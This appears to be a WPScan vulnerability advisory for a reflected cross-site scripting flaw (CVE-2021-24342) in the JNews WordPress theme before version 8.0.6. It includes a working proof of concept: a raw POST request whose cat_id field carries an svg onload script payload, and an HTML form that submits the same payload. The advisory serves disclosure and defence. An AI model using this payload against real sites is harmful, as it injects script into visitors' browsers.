logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)

Description

The theme did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.

Proof of Concept

POST /?ajax-request=jnews HTTP/1.1
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Connection: close

lang=en_US&cat_id=6"><svg/onload=alert(/XSS/)>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67


<html>
  <body>
    <form action="https://example.com/?ajax-request=jnews" method="POST">
      <input type="hidden" name="lang" value="en&#95;US" />
      <input type="hidden" name="cat&#95;id" value="6&quot;&gt;&lt;svg&#47;onload&#61;alert&#40;&#47;XSS&#47;&#41;&gt;" />
      <input type="hidden" name="action" value="jnews&#95;build&#95;mega&#95;category&#95;2" />
      <input type="hidden" name="number" value="6" />
      <input type="hidden" name="tags" value="70&#44;64&#44;10&#44;67" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Themes

jnews

Fixed in version 8.0.6

References

CVE

CVE-2021-24342

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

Truoc Phan from Techlab Corporation

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

truocphan

Verified

Yes

WPVDB ID

415ca763-fe65-48cb-acd3-b375a400217e

Timeline

Publicly Published

2021-05-24 (about 3 months ago)

Added

2021-05-24 (about 3 months ago)

Last Updated

2021-05-24 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin